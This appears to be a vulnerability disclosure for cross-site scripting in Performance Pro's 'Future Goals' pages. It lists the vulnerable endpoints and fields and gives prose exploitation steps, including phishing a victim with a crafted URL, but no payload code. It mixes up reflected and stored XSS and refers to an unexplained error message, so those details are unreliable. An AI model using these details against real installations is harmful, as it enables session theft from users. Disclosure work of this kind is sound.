# Reflected XSS - Future Goals
## Reflected XSS (authenticated)
Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II) via POST requests to:
{% hint style="warning" %}
`/index.php?mode=mGoalSetup&job=edit&type_id=2&id=`
{% endhint %}
### Description
The application is vulnerable to multiple instances of stored (persistent) XSS in the Future Goals functionality. Malicious input provided by an authenticated user is stored server-side and later rendered into the DOM without proper encoding or sanitization. This allows execution of arbitrary JavaScript in the context of any user viewing the affected pages.
## **Affected Endpoints and Parameters:**
**Input (create/update goal):**\
Vulnerable fields:
* Goal Name
* Goal Notes (name field)
* Action Step Name
* Notes Name
**Reflected when viewing/printing goals:**\
`GET /viewgoals.php?printview=1&type=future`\
Vulnerable fields:
* Goal Name
* Goal Description
* Action Step Description
***
### Exploitation
* Inject malicious javascript into any of the following input fields for future goals.
* Goal Name
* Goal Description
* Action Steps Name
* Action Steps Description
* Note Name
* **Send** the crafted URL to a victim via phishing, social engineering, or any other attack vector.
* When the victim navigates to the modified URL, the application reflects the malicious input directly into the browser without sufficient sanitization.
* **The victim’s browser renders the injected payload** in the error message, allowing arbitrary script execution within the victim's browser.
### Example 1: XSS in Updating/Creating Future Goals
* Any of the highlighted fields are vulnerable to XSS between the Update/Creation\
\
\
* Successful XSS exploitation\
## Example 2: XSS in View/Print of Future Goals
* Any of the highlighted fields are vulnerable to XSS in the View/Print URL\
* Successful XSS exploitation\
